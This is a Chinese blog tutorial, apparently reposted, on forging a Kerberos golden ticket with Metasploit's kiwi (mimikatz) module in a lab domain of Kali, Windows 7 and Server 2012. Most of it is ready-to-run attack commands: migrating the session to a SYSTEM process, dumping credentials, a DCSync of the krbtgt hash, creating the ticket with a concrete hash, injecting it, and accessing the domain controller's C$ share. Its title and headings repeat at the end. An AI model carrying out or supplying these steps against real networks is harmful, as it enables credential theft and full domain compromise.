msf中的kiwi模块同时支持32位和64位操作系统，由于该模块默认加载是32位操作系统，如果需要在64位操作系统上使用，则部分功能会受到限制。不过我们可以通过进程迁移的方式恢复它的使用功能，但注意，迁移到的进程应为"NT AUTHORITY\SYSTEM" ，其实这就相当于meterpreter shell下的”getsystem“这个操作。不过经过我的测试，在制作票据时恰恰需要的是域内管理员权限，系统权限不能达到”维持权限“的效果。下面介绍几种迁移进程方法：

（1）通过手动迁移进程

meterpreter shell下ps查看进程

选择一个system权限的进程，例如这里我选择的是pid为1148的，然后输入命令“migrate 1148”

（2）通过自动化的迁移，但不一定会迁移到system权限下

在meterpreter下，run post/windows/manage/mirgate

3.关于kiwi的命令简介

（1）help kiwi #帮助查看相关命令

（2）creds_all #列举所有凭据

（3）golden_ticket__create #创建黄金票据

（4）kerberos_ticket_use #使用kerberos票据

（5）kiwi_cmd #执行mimikatz的命令，即后面接mimikatz.exe的命令，但在格式上又有所不同

注：这里我就是简单介绍这几个制作黄金票据的命令，还有很多命令，以及模块用法，大家可以自行探索，后续如果我没那多作业要写，我可能会将这些命令整理出来。(QAQ)

二、实验过程

1.环境构成

（1）攻击机 kali

（2）域环境：

windows7 计算机名 pc1

windows server 2012 作为域控dc

2.实验步骤

（1）首先通过pc1获取域内管理员权限，然后制作黄金票据。

（2）通过pc1获取域内普通成员权限，然后导入票据，进行结果检验。

三、黄金票据的制作使用

1.制作票据的条件，以及如何获取该条件内容

（1）用户sid

进入shell，whoami /all

注：后面的“-500”不要。

（2）域名，同（1），ipconfig /all

（3）任意一个用户名，可以随便造一个。

（4）krbtgt账户的密码hash值

meterpreter下输入命令:

load kiwi 加载mimikatz模块

kiwi_cmd "lsadump::dcsync /domain:yizhiyu.dc /user:krbtgt"

（这里要加双引号，而在mimikatz.exe中则不需要，这就是我上面所说的相同但有些不同）

2.制作黄金票据

load kiwi 将mimikatz模块加载

golden_ticket_create -d yizhiyu.dc -k 61f3fbebc048cdee4bfa3431f676a3a1 -u administrator -t /root/administrator.ticket

注：

（1） -d 后接域名

-k krbtgt账户的密码hash值

-u 任意的用户名，那么这里我就用administrator

-t 将生成的票据保存在kali中，administrator.ticket这个文件名字以及后缀可以随意

（2）这里再次强调，这个操作只能在域内管理员权限下制作，系统权限不行，即不能将进程迁移到system权限上或者是getsystem提权。

3.黄金票据的使用

（1）使用场景：当我们拿到这个域内的某个低权限即域内成员的账号权限时候，可以利用制作好的票据进行提权攻击。

（2）引用票据

load kiwi 加载mimikatz模块

kerberos_ticket_use /root/administrator

shell进入终端，dir \\dc\c$ 发现可以访问成功，那么说明就成功了，后续就可以通过交互shell或者其他协议的方式进行对其他主机的控制。

声明：本文内容由网友自发贡献，不代表【wpsshop博客】立场，版权归原作者所有，本站不承担相应法律责任。如您发现有侵权的内容，请联系我们。转载请注明出处：https://www.wpsshop.cn/article/detail/41172

基于MSF框架下的kiwi模块制作黄金票据_新版msf中mimikate已经被集成到msf的一个框架中 这个框架是什么 kiwi

一、kiwi模块使用简介

1.权限问题

2.使用注意事项